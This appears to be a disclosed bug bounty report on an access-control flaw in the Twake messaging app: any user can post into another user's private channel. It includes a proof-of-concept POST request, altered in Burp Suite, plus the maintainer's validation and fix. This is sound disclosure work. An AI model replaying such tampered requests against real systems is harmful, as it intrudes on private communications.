Send any message to any to any private channel in linagora/twake

Valid

Reported on

Jan 1st 2023


Description

A user can add any message to a private channel that is not in that channel. This error is because the web application did not check if the sender userid is in that private channel.

Proof of Concept

Login to website in brower 1 with user A.

Login to website in brower 2 with user B.

User A in brower 1 create private channel. User B in brower 2 capture request send message with burpsuite.

Get User A private channel id, replace it with User B request to send a message on burpsuite.

POST /internal/services/messages/v1/companies/9060b950-89b4-11ed-902d-338d3eb6e868/threads HTTP/1.1

{"resource":{"participants":[{"type":"channel","id":"ddd58469-9c1a-4548-ba28-5ad057522f7f","company_id":"9060b950-89b4-11ed-902d-338d3eb6e868","workspace_id":"9072bab0-89b4-11ed-902d-338d3eb6e868"}]},"options":{"message":{"thread_id":"59c0d1b0-89b8-11ed-81da-e96b2398db85","created_at":1672566039115,"user_id":"eee929d0-89b4-11ed-902d-338d3eb6e868","context":{"_front_id":"59c0d1b1-89b8-11ed-81da-e96b2398db85"},"text":"This is message private","files":[]}}}

Demo: https://drive.google.com/file/d/1eDipnxCFUm6JUtJJHBo8AYM1ofNSnblN/view

Impact

A User can send any message to any to any private channel.

We are processing your report and will contact the linagora/twake team within 24 hours. 8 days ago
We have contacted a member of the linagora/twake team and are waiting to hear back 7 days ago
Romaric Mourgues modified the Severity from Medium (6.3) to High (8.3) 5 days ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Romaric Mourgues validated this vulnerability 5 days ago

Thanks, we are working on a fix today

Kevin Kien has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Romaric Mourgues marked this as fixed in 2022.Q3.1120-patch with commit 721d9b 5 days ago
Romaric Mourgues has been awarded the fix bounty
This vulnerability will not receive a CVE
This vulnerability is scheduled to go public on Jan 7th 2023
Kevin Kien
5 days ago

Researcher


I can receive a CVE for this bug

Romaric Mourgues published this vulnerability 3 days ago
to join this conversation